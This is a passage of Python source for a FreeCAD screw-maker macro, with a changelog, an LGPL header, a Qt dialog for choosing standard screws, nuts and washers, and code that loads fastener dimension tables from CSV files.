Version 1.4 from 1st of September 2013
Version 1.5 from 23rd of December 2013
Corrected hex-heads above M12 not done.
Version 1.6 from 15th of March 2014
Added PySide support
Version 1.7 from April 2014
fixed bool type error. (int is not anymore accepted at linux)
fixed starting point of real thread at some screw types.
Version 1.8 from July 2014
first approach for a faster real thread
Version 1.9 / 2.0 July 2015
new calculation of starting point of thread
shell-based approach for screw generation
added:
ISO 14582 Hexalobular socket countersunk head screws, high head
ISO 14584 Hexalobular socket raised countersunk head screws
ISO 7380-2 Hexagon socket button head screws with collar
DIN 967 Cross recessed pan head screws with collar
ISO 4032 Hexagon nuts, Style 1
ISO 4033 Hexagon nuts, Style 2
ISO 4035 Hexagon thin nuts, chamfered
EN 1661 Hexagon nuts with flange
ISO 7094 definitions Plain washers - Extra large series
ISO 7092 definitions Plain washers - Small series
ISO 7093-1 Plain washer - Large series
Screw-tap to drill inner threads in parts with user defined length
ScrewMaker can now also used as a python module.
The following shows how to generate a screw from a python script:
import screw_maker2_0
threadDef = 'M3.5'
o = screw_maker2_0.Screw()
t = screw_maker2_0.Screw.setThreadType(o,'real')
# Creates a Document-Object with label describing the screw
d = screw_maker2_0.Screw.createScrew(o, 'ISO1207', threadDef, '20', 'real')
# creates a shape in memory
t = screw_maker2_0.Screw.setThreadType(o,'real')
s = screw_maker1_9d.Screw.makeIso7046(o, 'ISO14582', threadDef, 40.0)
Part.show(s)
to do: check ISO7380 usage of rs and rt, actual only rs is used
check chamfer angle on hexogon heads and nuts
***************************************************************************
* Copyright (c) 2013, 2014, 2015 *
* Ulrich Brammer <ulrich1a[at]users.sourceforge.net> *
* *
* This file is a supplement to the FreeCAD CAx development system. *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU Lesser General Public License (LGPL) *
* as published by the Free Software Foundation; either version 2 of *
* the License, or (at your option) any later version. *
* for detail see the LICENCE text file. *
* *
* This software is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU Library General Public License for more details. *
* *
* You should have received a copy of the GNU Library General Public *
* License along with this macro; if not, write to the Free Software *
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
* USA *
* *
***************************************************************************
"""
__author__ = "Ulrich Brammer <ulrich1a@users.sourceforge.net>"
import FreeCAD, FreeCADGui, Part, math, csv, os
from FreeCAD import Base
import DraftVecUtils
try:
from PySide import QtCore, QtGui
#FreeCAD.Console.PrintMessage("PySide is used" + "\n")
except:
#FreeCAD.Console.PrintMessage("PyQt4 is needed" + "\n")
from PyQt4 import QtCore, QtGui
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
DEBUG = False # set to True to show debug messages; does not work, still todo.
# import fastener data
__dir__ = os.path.dirname(__file__)
fsdatapath = os.path.join(__dir__, 'FsData')
# function to open a csv file and convert it to a dictionary
def csv2dict(filename, fieldsnamed=True):
data = open(filename, 'r')
reader = csv.reader(data, skipinitialspace=True, dialect='unix', quoting=csv.QUOTE_NONNUMERIC)
dictvar = {}
if fieldsnamed:
# skip the first line
next(reader)
for line_list in reader:
thekey = str(line_list[0])
datavalues = line_list[1:]
thevalue = []
for item in datavalues:
thevalue.append(item)
thevalue = tuple(thevalue)
dictvar.update({thekey: thevalue})
return dictvar
FsData = {}
filelist = os.listdir(fsdatapath)
for item in filelist:
if item[-4:] == '.csv':
itempath = os.path.join(fsdatapath, item)
itemdict = csv2dict(itempath, fieldsnamed=True)
FsData.update({item[0:-4]: itemdict})
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_ScrewMaker(object):
def setupUi(self, ScrewMaker):
FCUi = FreeCADGui.UiLoader()
ScrewMaker.setObjectName(_fromUtf8("ScrewMaker"))
ScrewMaker.resize(450, 362)
ScrewMaker.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedKingdom))
self.layoutWidget = QtGui.QWidget(ScrewMaker)
self.layoutWidget.setGeometry(QtCore.QRect(348, 35, 102, 161))
self.layoutWidget.setObjectName(_fromUtf8("layoutWidget"))
self.verticalLayout_2 = QtGui.QVBoxLayout(self.layoutWidget)
# self.verticalLayout_2.setMargin(0)
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.ScrewTypeLabel = QtGui.QLabel(self.layoutWidget)
self.ScrewTypeLabel.setObjectName(_fromUtf8("ScrewTypeLabel"))
self.verticalLayout_2.addWidget(self.ScrewTypeLabel)
self.NomDiaLabel = QtGui.QLabel(self.layoutWidget)
self.NomDiaLabel.setObjectName(_fromUtf8("NomDiaLabel"))
self.verticalLayout_2.addWidget(self.NomDiaLabel)
self.NomLenLabel = QtGui.QLabel(self.layoutWidget)
self.NomLenLabel.setObjectName(_fromUtf8("NomLenLabel"))
self.verticalLayout_2.addWidget(self.NomLenLabel)
self.UserLenLabel = QtGui.QLabel(self.layoutWidget)
self.UserLenLabel.setObjectName(_fromUtf8("UserLenLabel"))
self.verticalLayout_2.addWidget(self.UserLenLabel)
self.layoutWidget1 = QtGui.QWidget(ScrewMaker)
self.layoutWidget1.setGeometry(QtCore.QRect(3, 35, 350, 166))
# self.layoutWidget1.setGeometry(QtCore.QRect(10, 5, 315, 200))
self.layoutWidget1.setObjectName(_fromUtf8("layoutWidget1"))
self.verticalLayout = QtGui.QVBoxLayout(self.layoutWidget1)
# self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.ScrewType = QtGui.QComboBox(self.layoutWidget1)
self.ScrewType.setObjectName(_fromUtf8("ScrewType"))
for i in range(57):
self.ScrewType.addItem(_fromUtf8("")) # 0
self.verticalLayout.addWidget(self.ScrewType)
self.NominalDiameter = QtGui.QComboBox(self.layoutWidget1)
self.NominalDiameter.setObjectName(_fromUtf8("NominalDiameter"))
for i in range(28):
self.NominalDiameter.addItem(_fromUtf8("")) # 0
self.verticalLayout.addWidget(self.NominalDiameter)
self.NominalLength = QtGui.QComboBox(self.layoutWidget1)
self.NominalLength.setObjectName(_fromUtf8("NominalLength"))
for i in range(48):
self.NominalLength.addItem(_fromUtf8("")) # 0
self.verticalLayout.addWidget(self.NominalLength)
# self.UserLen = QtGui.QComboBox(self.layoutWidget1)
self.UserLen = FCUi.createWidget("Gui::InputField")
self.UserLen.setObjectName(_fromUtf8("UserLen"))
# self.UserLen.addItem(_fromUtf8(""))
self.UserLen.setProperty("text", "0 mm")
self.verticalLayout.addWidget(self.UserLen)
# self.CommentLabel = QtGui.QLabel(self.layoutWidget)
self.CommentLabel = QtGui.QLabel(ScrewMaker)
self.CommentLabel.setObjectName(_fromUtf8("CommentLabel"))
self.CommentLabel.setGeometry(QtCore.QRect(10, 184, 411, 21))
# self.verticalLayout.addWidget(self.CommentLabel)
self.layoutWidget2 = QtGui.QWidget(ScrewMaker)
# self.layoutWidget2.setGeometry(QtCore.QRect(10, 200, 321, 83))
self.layoutWidget2.setGeometry(QtCore.QRect(3, 200, 321, 120))
self.layoutWidget2.setObjectName(_fromUtf8("layoutWidget2"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.layoutWidget2)
# self.verticalLayout_3.setMargin(0)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.SimpleScrew = QtGui.QRadioButton(self.layoutWidget2)
self.SimpleScrew.setChecked(True)
self.SimpleScrew.setObjectName(_fromUtf8("SimpleScrew"))
self.verticalLayout_3.addWidget(self.SimpleScrew)
self.SymbolThread = QtGui.QRadioButton(self.layoutWidget2)
self.SymbolThread.setObjectName(_fromUtf8("SymbolThread"))
self.verticalLayout_3.addWidget(self.SymbolThread)
self.RealThread = QtGui.QRadioButton(self.layoutWidget2)
self.RealThread.setObjectName(_fromUtf8("RealThread"))
self.verticalLayout_3.addWidget(self.RealThread)
self.MessageLabel = QtGui.QLabel(ScrewMaker)
self.MessageLabel.setGeometry(QtCore.QRect(10, 10, 411, 21))
self.MessageLabel.setProperty("Empty_text", _fromUtf8(""))
self.MessageLabel.setObjectName(_fromUtf8("MessageLabel"))
self.CreateButton = QtGui.QToolButton(ScrewMaker)
self.CreateButton.setGeometry(QtCore.QRect(180, 320, 111, 26))
self.CreateButton.setObjectName(_fromUtf8("CreateButton"))
self.ScrewAvailable = True
self.simpThread = self.SimpleScrew.isChecked()
self.symThread = self.SymbolThread.isChecked()
self.rThread = self.RealThread.isChecked()
self.theScrew = Screw()
self.retranslateUi(ScrewMaker)
self.NominalDiameter.setCurrentIndex(5)
self.NominalLength.setCurrentIndex(9)
QtCore.QObject.connect(self.ScrewType, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.guiCheck_Data)
QtCore.QObject.connect(self.CreateButton, QtCore.SIGNAL(_fromUtf8("pressed()")), self.guiCreateScrew)
QtCore.QObject.connect(self.NominalDiameter, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.guiCheck_Data)
QtCore.QObject.connect(self.NominalLength, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.guiCheck_Data)
QtCore.QMetaObject.connectSlotsByName(ScrewMaker)
def retranslateUi(self, ScrewMaker):
ScrewMaker.setWindowTitle(_translate("ScrewMaker", "Screw-Maker 2.0", None))
self.ScrewTypeLabel.setText(_translate("ScrewMaker", "Type of Screw", None))
self.NomDiaLabel.setText(_translate("ScrewMaker", "Nominal\nDiameter", None))
self.NomLenLabel.setText(_translate("ScrewMaker", "Nominal\nLength", None))
self.UserLenLabel.setText(_translate("ScrewMaker", "User length \nfor screw-tap", None))
self.CommentLabel.setText(_translate("ScrewMaker", "Values in brackets are not recommended!", None))
self.ScrewType.setItemText(0, _translate("ScrewMaker", "ISO4017: Hexagon head screws", None))
self.ScrewType.setItemText(1, _translate("ScrewMaker", "ISO4014: Hexagon head bolts", None))
self.ScrewType.setItemText(2, _translate("ScrewMaker", "EN1662: Hexagon bolts with flange, small\n series",None))
self.ScrewType.setItemText(3, _translate("ScrewMaker", "EN1665: Hexagon bolts with flange, heavy\n series",None))
self.ScrewType.setItemText(4, _translate("ScrewMaker", "ISO4762: Hexagon socket head cap screws", None))
self.ScrewType.setItemText(5, _translate("ScrewMaker", "ISO7380-1: Hexagon socket button head\n screws", None))
self.ScrewType.setItemText(6, _translate("ScrewMaker", "ISO7380-2: Hexagon socket button head\n screws with collar", None))
self.ScrewType.setItemText(7, _translate("ScrewMaker", "DIN967: Cross recessed pan head screws\n with collar", None))
self.ScrewType.setItemText(8, _translate("ScrewMaker", "ISO10642: Hexagon socket countersunk \n head screws", None))
self.ScrewType.setItemText(9, _translate("ScrewMaker", "ISO2009: Slotted countersunk flat head\n screws", None))
self.ScrewType.setItemText(10, _translate("ScrewMaker", "ISO2010: Slotted raised countersunk head\n screws", None))
self.ScrewType.setItemText(11, _translate("ScrewMaker", "ISO1207: Slotted cheese head screws", None))
self.ScrewType.setItemText(12, _translate("ScrewMaker", "ISO1580: Slotted pan head screws", None))
self.ScrewType.setItemText(13, _translate("ScrewMaker", "ISO7045: Pan head screws, type H cross recess", None))
self.ScrewType.setItemText(14, _translate("ScrewMaker", "ISO7046: Countersunk flat head screws\n H cross recess", None))
self.ScrewType.setItemText(15, _translate("ScrewMaker", "ISO7047: Raised countersunk head screws\n H cross recess", None))
self.ScrewType.setItemText(16, _translate("ScrewMaker", "ISO7048: Cheese head screws type H cross recess", None))
self.ScrewType.setItemText(17, _translate("ScrewMaker", "ISO14579: Hexalobular socket head cap screws", None))
self.ScrewType.setItemText(18, _translate("ScrewMaker", "ISO14580: Hexalobular socket cheese head\n screws", None))
self.ScrewType.setItemText(19, _translate("ScrewMaker", "ISO14583: Hexalobular socket pan head screws", None))
self.ScrewType.setItemText(20, _translate("ScrewMaker", "ISO14582: Hexalobular socket countersunk\n head screws, high head", None))
self.ScrewType.setItemText(21, _translate("ScrewMaker", "ISO14584: Hexalobular socket raised\n countersunk head screws", None))
self.ScrewType.setItemText(22, _translate("ScrewMaker", "ISO7089: Plain washers - Normal series", None))
self.ScrewType.setItemText(23, _translate("ScrewMaker", "ISO7090: Plain washers, chamfered - Normal series", None))
self.ScrewType.setItemText(24, _translate("ScrewMaker", "ISO7092: Plain washers - Small series", None))
self.ScrewType.setItemText(25, _translate("ScrewMaker", "ISO7093-1: Plain washer - Large series", None))
self.ScrewType.setItemText(26, _translate("ScrewMaker", "ISO7094: Plain washers - Extra large series", None))
self.ScrewType.setItemText(27, _translate("ScrewMaker", "ISO4032: Hexagon nuts, Style 1", None))
self.ScrewType.setItemText(28, _translate("ScrewMaker", "ISO4033: Hexagon nuts, Style 2", None))
self.ScrewType.setItemText(29, _translate("ScrewMaker", "ISO4035: Hexagon thin nuts, chamfered", None))
self.ScrewType.setItemText(30, _translate("ScrewMaker", "EN1661: Hexagon nuts with flange", None))
self.ScrewType.setItemText(31, _translate("ScrewMaker", "ScrewTap: ISO Screw-Tap", None))
self.ScrewType.setItemText(32, _translate("ScrewMaker", "ScrewDie: ISO Screw-Die", None))
self.ScrewType.setItemText(33, _translate("ScrewMaker", "ThreadedRod: DIN 975 Threaded Rod", None))
self.ScrewType.setItemText(34, _translate("ScrewMaker", "DIN7984: Hexagon socket head cap screws with low head", None))
self.ScrewType.setItemText(34, _translate("ScrewMaker", "DIN6912: Hexagon socket head cap screws with low head, with centre", None))
self.ScrewType.setItemText(35, _translate("ScrewMaker", "ISO7379: Hexagon socket head shoulder screws", None))
self.ScrewType.setItemText(36, _translate("ScrewMaker", "ISO4026: Hexagon socket set screws with flat point", None))
self.ScrewType.setItemText(37, _translate("ScrewMaker", "ISO4027: Hexagon socket set screws with cone point", None))
self.ScrewType.setItemText(38, _translate("ScrewMaker", "ISO4028: Hexagon socket set screws with dog point", None))
self.ScrewType.setItemText(39, _translate("ScrewMaker", "ISO4029: Hexagon socket set screws with cup point", None))
self.ScrewType.setItemText(40, _translate("ScrewMaker", "ASMEB18.2.1.6: UNC Hexagon head screws", None))
self.ScrewType.setItemText(41, _translate("ScrewMaker", "ASMEB18.2.1.8: UNC hex head bolts with flange", None))
self.ScrewType.setItemText(42, _translate("ScrewMaker", "ASMEB18.2.2.1A: UNC machine screw nuts", None))
self.ScrewType.setItemText(43, _translate("ScrewMaker", "ASMEB18.2.2.4A: UNC Hexagon nuts", None))
self.ScrewType.setItemText(44, _translate("ScrewMaker", "ASMEB18.2.2.4B: UNC Hexagon thin nuts", None))
self.ScrewType.setItemText(45, _translate("ScrewMaker", "ASMEB18.3.1A: UNC Hexagon socket head cap screws", None))
self.ScrewType.setItemText(46, _translate("ScrewMaker", "ASMEB18.3.3A: UNC Hexagon socket button head screws", None))
self.ScrewType.setItemText(47, _translate("ScrewMaker", "ASMEB18.3.3B: UNC Hexagon socket button head screws with flange", None))
self.ScrewType.setItemText(48, _translate("ScrewMaker", "ASMEB18.3.4: UNC Hexagon socket head shoulder screws", None))
self.ScrewType.setItemText(49, _translate("ScrewMaker", "ASMEB18.3.5A: UNC Hexagon socket set screws with flat point", None))
self.ScrewType.setItemText(50, _translate("ScrewMaker", "ASMEB18.3.5B: UNC Hexagon socket set screws with cone point", None))
self.ScrewType.setItemText(51, _translate("ScrewMaker", "ASMEB18.3.5C: UNC Hexagon socket set screws with dog point", None))
self.ScrewType.setItemText(52, _translate("ScrewMaker", "ASMEB18.3.5D: UNC Hexagon socket set screws with cup point", None))
self.ScrewType.setItemText(53, _translate("ScrewMaker", "ASMEB18.6.3.1A: UNC slotted countersunk flat head screws", None))
self.ScrewType.setItemText(54, _translate("ScrewMaker", "ASMEB18.21.1.12A: UN washers, narrow series", None))
self.ScrewType.setItemText(55, _translate("ScrewMaker", "ASMEB18.21.1.12B: UN washers, regular series", None))
self.ScrewType.setItemText(56, _translate("ScrewMaker", "ASMEB18.21.1.12C: UN washers, wide series", None))
self.NominalDiameter.setItemText(0, _translate("ScrewMaker", "M1.6", None))
self.NominalDiameter.setItemText(1, _translate("ScrewMaker", "M2", None))
self.NominalDiameter.setItemText(2, _translate("ScrewMaker", "M2.5", None))
self.NominalDiameter.setItemText(3, _translate("ScrewMaker", "M3", None))
self.NominalDiameter.setItemText(4, _translate("ScrewMaker", "(M3.5)", None))
self.NominalDiameter.setItemText(5, _translate("ScrewMaker", "M4", None))
self.NominalDiameter.setItemText(6, _translate("ScrewMaker", "M5", None))
self.NominalDiameter.setItemText(7, _translate("ScrewMaker", "M6", None))
self.NominalDiameter.setItemText(8, _translate("ScrewMaker", "M8", None))
self.NominalDiameter.setItemText(9, _translate("ScrewMaker", "M10", None))
self.NominalDiameter.setItemText(10, _translate("ScrewMaker", "M12", None))
self.NominalDiameter.setItemText(11, _translate("ScrewMaker", "(M14)", None))
self.NominalDiameter.setItemText(12, _translate("ScrewMaker", "M16", None))
self.NominalDiameter.setItemText(13, _translate("ScrewMaker", "(M18)", None))
self.NominalDiameter.setItemText(14, _translate("ScrewMaker", "M20", None))
self.NominalDiameter.setItemText(15, _translate("ScrewMaker", "(M22)", None))
self.NominalDiameter.setItemText(16, _translate("ScrewMaker", "M24", None))
self.NominalDiameter.setItemText(17, _translate("ScrewMaker", "(M27)", None))
self.NominalDiameter.setItemText(18, _translate("ScrewMaker", "M30", None))
self.NominalDiameter.setItemText(19, _translate("ScrewMaker", "M36", None))
self.NominalDiameter.setItemText(20, _translate("ScrewMaker", "(M33)", None))
self.NominalDiameter.setItemText(21, _translate("ScrewMaker", "M42", None))
self.NominalDiameter.setItemText(22, _translate("ScrewMaker", "(M45)", None))
self.NominalDiameter.setItemText(23, _translate("ScrewMaker", "M48", None))
self.NominalDiameter.setItemText(24, _translate("ScrewMaker", "(M52)", None))
self.NominalDiameter.setItemText(25, _translate("ScrewMaker", "M54", None))
self.NominalDiameter.setItemText(26, _translate("ScrewMaker", "(M60)", None))
self.NominalDiameter.setItemText(27, _translate("ScrewMaker", "M64", None))
self.NominalLength.setItemText(0, _translate("ScrewMaker", "2", None))
self.NominalLength.setItemText(1, _translate("ScrewMaker", "2.5", None))
self.NominalLength.setItemText(2, _translate("ScrewMaker", "3", None))
self.NominalLength.setItemText(3, _translate("ScrewMaker", "4", None))
self.NominalLength.setItemText(4, _translate("ScrewMaker", "5", None))
self.NominalLength.setItemText(5, _translate("ScrewMaker", "6", None))
self.NominalLength.setItemText(6, _translate("ScrewMaker", "8", None))
self.NominalLength.setItemText(7, _translate("ScrewMaker", "10", None))
self.NominalLength.setItemText(8, _translate("ScrewMaker", "12", None))
self.NominalLength.setItemText(9, _translate("ScrewMaker", "16", None))
self.NominalLength.setItemText(10, _translate("ScrewMaker", "20", None))
self.NominalLength.setItemText(11, _translate("ScrewMaker", "25", None))
self.NominalLength.setItemText(12, _translate("ScrewMaker", "30", None))
self.NominalLength.setItemText(13, _translate("ScrewMaker", "35", None))
self.NominalLength.setItemText(14, _translate("ScrewMaker", "40", None))
self.NominalLength.setItemText(15, _translate("ScrewMaker", "45", None))
self.NominalLength.setItemText(16, _translate("ScrewMaker", "50", None))
self.NominalLength.setItemText(17, _translate("ScrewMaker", "55", None))
self.NominalLength.setItemText(18, _translate("ScrewMaker", "60", None))
self.NominalLength.setItemText(19, _translate("ScrewMaker", "65", None))
self.NominalLength.setItemText(20, _translate("ScrewMaker", "70", None))
self.NominalLength.setItemText(21, _translate("ScrewMaker", "80", None))
self.NominalLength.setItemText(22, _translate("ScrewMaker", "90", None))
self.NominalLength.setItemText(23, _translate("ScrewMaker", "100", None))
self.NominalLength.setItemText(24, _translate("ScrewMaker", "110", None))
self.NominalLength.setItemText(25, _translate("ScrewMaker", "120", None))
self.NominalLength.setItemText(26, _translate("ScrewMaker", "130", None))
self.NominalLength.setItemText(27, _translate("ScrewMaker", "140", None))
self.NominalLength.setItemText(28, _translate("ScrewMaker", "150", None))
self.NominalLength.setItemText(29, _translate("ScrewMaker", "160", None))
self.NominalLength.setItemText(30, _translate("ScrewMaker", "180", None))
self.NominalLength.setItemText(31, _translate("ScrewMaker", "200", None))
self.NominalLength.setItemText(32, _translate("ScrewMaker", "220", None))
self.NominalLength.setItemText(33, _translate("ScrewMaker", "240", None))
self.NominalLength.setItemText(34, _translate("ScrewMaker", "260", None))
self.NominalLength.setItemText(35, _translate("ScrewMaker", "280", None))
self.NominalLength.setItemText(36, _translate("ScrewMaker", "300", None))
self.NominalLength.setItemText(37, _translate("ScrewMaker", "320", None))
self.NominalLength.setItemText(38, _translate("ScrewMaker", "340", None))
self.NominalLength.setItemText(39, _translate("ScrewMaker", "360", None))
self.NominalLength.setItemText(40, _translate("ScrewMaker", "380", None))
self.NominalLength.setItemText(41, _translate("ScrewMaker", "400", None))
self.NominalLength.setItemText(42, _translate("ScrewMaker", "420", None))
self.NominalLength.setItemText(43, _translate("ScrewMaker", "440", None))
self.NominalLength.setItemText(44, _translate("ScrewMaker", "460", None))
self.NominalLength.setItemText(45, _translate("ScrewMaker", "480", None))
self.NominalLength.setItemText(46, _translate("ScrewMaker", "500", None))
self.NominalLength.setItemText(47, _translate("ScrewMaker", "User", None))
# self.UserLen.setItemText(0, _translate("ScrewMaker", "regular pitch", None))
self.SimpleScrew.setText(_translate("ScrewMaker", "Simple Screw (no thread at all!)", None))
self.SymbolThread.setText(_translate("ScrewMaker", "Symbol Thread (not implemented yet)", None))
self.RealThread.setText(
_translate("ScrewMaker", "Real Thread (takes time, memory intensive)\nMay not work for all screws!", None))
self.MessageLabel.setText(_translate("ScrewMaker", "Select your screw type", None))
self.MessageLabel.setProperty("Errortext", _translate("ScrewMaker", "Combination not implemented", None))
self.MessageLabel.setProperty("OK_text", _translate("ScrewMaker", "Screw is made", None))
self.CreateButton.setText(_translate("ScrewMaker", "create", None))
def guiCheck_Data(self):
ST_text = str(self.ScrewType.currentText())
ST_text = ST_text.split(':')[0]
ND_text = str(self.NominalDiameter.currentText())
NL_text = str(self.NominalLength.currentText())
M_text, self.ScrewAvailable = self.theScrew.check_Data(ST_text, ND_text, NL_text)
self.MessageLabel.setText(_translate("ScrewMaker", M_text, None))
def guiCreateScrew(self):
# self.simpThread = self.SimpleScrew.isChecked()
# self.symThread = self.SymbolThread.isChecked()
# self.rThread = self.RealThread.isChecked()
if self.SimpleScrew.isChecked():
threadType = 'simple'
if self.SymbolThread.isChecked():
threadType = 'symbol'
if self.RealThread.isChecked():
threadType = 'real'
ND_text = str(self.NominalDiameter.currentText())
NL_text = str(self.NominalLength.currentText())
ST_text = str(self.ScrewType.currentText())
ST_text = ST_text.split(':')[0]
if ST_text == ('ScrewTap' or 'ScrewDie' or 'ThreadedRod'):
if NL_text == 'User':
textValue = self.UserLen.property("text")
stLength = FreeCAD.Units.parseQuantity(textValue).Value
NL_text = str(stLength)
myObj = self.theScrew.createScrew(ST_text, ND_text, NL_text, threadType)
class Screw:
def __init__(self):
self.objAvailable = True
self.Tuner = 510
# thread scaling for 3D printers
# scaled_diam = diam * ScaleA + ScaleB
self.sm3DPrintMode = False
self.smNutThrScaleA = 1.0
self.smNutThrScaleB = 0.0
self.smScrewThrScaleA = 1.0
self.smScrewThrScaleB = 0.0
def check_Data(self, ST_text, ND_text, NL_text):
# FreeCAD.Console.PrintMessage("Data checking" + NL_text + "\n")
# set screw not ok
self.objAvailable = False
M_text = "Select your screw type"
Type_text = ''
if ST_text == 'ISO4017':
table = FsData["iso4017head"]
tab_len = FsData["iso4017length"]
tab_range = FsData["iso4017range"]
Type_text = 'Screw'
if ST_text == 'EN1662':
table = FsData["en1662def"]
tab_len = FsData["en1662length"]
tab_range = FsData["en1662range"]
Type_text = 'Screw'
if ST_text == 'EN1665':
table = FsData["en1665def"]
tab_len = FsData["en1665length"]
tab_range = FsData["en1665range"]
Type_text = 'Screw'
if ST_text == 'ISO2009':
table = FsData["iso2009def"]
tab_len = FsData["iso2009length"]
tab_range = FsData["iso2009range"]
Type_text = 'Screw'
if ST_text == 'ISO2010':
table = FsData["iso2009def"]
tab_len = FsData["iso2009length"]
tab_range = FsData["iso2009range"]
Type_text = 'Screw'
if ST_text == 'ISO4762':
table = FsData["iso4762def"]
tab_len = FsData["iso4762length"]
tab_range = FsData["iso4762range"]
Type_text = 'Screw'
if ST_text == 'ISO10642':
table = FsData["iso10642def"]
tab_len = FsData["iso10642length"]
tab_range = FsData["iso10642range"]
Type_text = 'Screw'
if ST_text == 'ISO4014':
table = FsData["iso4014head"]
tab_len = FsData["iso4014length"]
tab_range = FsData["iso4014range"]
Type_text = 'Screw'
if ST_text == 'ISO1207':
table = FsData["iso1207def"]
tab_len = FsData["iso1207length"]
tab_range = FsData["iso1207range"]
Type_text = 'Screw'
if ST_text == 'ISO1580':
table = FsData["iso1580def"]
tab_len = FsData["iso2009length"]
tab_range = FsData["iso2009range"]
Type_text = 'Screw'
if ST_text == 'ISO7045':
table = FsData["iso7045def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7045range"]
Type_text = 'Screw'
if ST_text == 'ISO7046':
table = FsData["iso7046def"] # contains only cross recess data
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7046range"]
Type_text = 'Screw'
if ST_text == 'ISO7047':
table = FsData["iso2009def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7046range"]
Type_text = 'Screw'
if ST_text == 'ISO7048':
table = FsData["iso7048def"]
tab_len = FsData["iso7048length"]
tab_range = FsData["iso7048range"]
Type_text = 'Screw'
if ST_text == 'ISO7380-1':
table = FsData["iso7380def"]
tab_len = FsData["iso7380length"]
tab_range = FsData["iso7380range"]
Type_text = 'Screw'
if ST_text == 'ISO7380-2':
table = FsData["iso7380_2def"]
tab_len = FsData["iso7380length"]
tab_range = FsData["iso7380range"]
Type_text = 'Screw'
if ST_text == 'DIN967':
table = FsData["din967def"]
tab_len = FsData["din967length"]
tab_range = FsData["din967range"]
Type_text = 'Screw'
if ST_text == 'ISO14579':
table = FsData["iso14579def"]
tab_len = FsData["iso14579length"]
tab_range = FsData["iso14579range"]
Type_text = 'Screw'
if ST_text == 'ISO14580':
table = FsData["iso14580def"]
tab_len = FsData["iso14580length"]
tab_range = FsData["iso1207range"]
Type_text = 'Screw'
if ST_text == 'ISO14583':
table = FsData["iso14583def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso7046range"]
Type_text = 'Screw'
if ST_text == 'ISO14584':
table = FsData["iso14584def"]
tab_len = FsData["iso7045length"]
tab_range = FsData["iso14584range"]
Type_text = 'Screw'
if ST_text == 'ISO14582':
table = FsData["iso14582def"]
tab_len = FsData["iso14582length"]
tab_range = FsData["iso14582range"]
Type_text = 'Screw'
if ST_text == 'ISO7089':
table = FsData["iso7089def"]
Type_text = 'Washer'
if ST_text == 'ISO7090':
table = FsData["iso7090def"]
Type_text = 'Washer'
if ST_text == 'ISO7091':
table = FsData["iso7091def"]
Type_text = 'Washer'
if ST_text == 'ISO7092':
table = FsData["iso7092def"]
Type_text = 'Washer'
if ST_text == 'ISO7093-1':
table = FsData["iso7093def"]
Type_text = 'Washer'
if ST_text == 'ISO7094':
table = FsData["iso7094def"]
Type_text = 'Washer'
if (ST_text == 'ISO4026') or (ST_text == 'ISO4027') or (ST_text == 'ISO4029'):
table = FsData["iso4026def"]
tab_len = FsData["iso4026length"]
tab_range = FsData["iso4026range"]
Type_text = 'Screw'
if ST_text == 'ISO4028':
table = FsData["iso4028def"]
tab_len = FsData["iso4028length"]
tab_range = FsData["iso4028range"]
Type_text = 'Screw'
if ST_text == 'ISO4032':
table = FsData["iso4032def"]
Type_text = 'Nut'
if ST_text == 'ISO4033':
table = FsData["iso4033def"]
Type_text = 'Nut'
if ST_text == 'ISO4035':
table = FsData["iso4035def"]
Type_text = 'Nut'
if ST_text == 'ISO4036':
table = FsData["iso4036def"]
Type_text = 'Nut'
if ST_text == 'EN1661':
table = FsData["en1661def"]
Type_text = 'Nut'
if ST_text == 'DIN7984':
table = FsData["din7984def"]
tab_len = FsData["din7984length"]
tab_range = FsData["din7984range"]
Type_text = 'Screw'
if ST_text == 'DIN6912':
table = FsData["din6912def"]
tab_len = FsData["din6912length"]
tab_range = FsData["din6912range"]
Type_text = 'Screw'
if ST_text == 'iso7379':
table = FsData["iso7379def"]
tab_len = FsData["iso7379length"]
tab_range = FsData["iso7379range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.2.1.6':
table = FsData["asmeb18.2.1.6def"]
tab_len = FsData["asmeb18.2.1.6length"]
tab_range = FsData["asmeb18.2.1.6range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.2.1.8':
table = FsData["asmeb18.2.1.8def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.2.1.8range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.2.2.1A':
table = FsData["asmeb18.2.2.1adef"]
Type_text = 'Nut'
if ST_text == 'ASMEB18.2.2.4A':
table = FsData["asmeb18.2.2.4def"]
Type_text = 'Nut'
if ST_text == 'ASMEB18.2.2.4B':
table = FsData["asmeb18.2.2.4def"]
Type_text = 'Nut'
if ST_text == 'ASMEB18.3.1A':
table = FsData["asmeb18.3.1adef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.1arange"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.3.3A':
table = FsData["asmeb18.3.3adef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.3arange"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.3.3B':
table = FsData["asmeb18.3.3bdef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.3brange"]
Type_text = 'Screw'
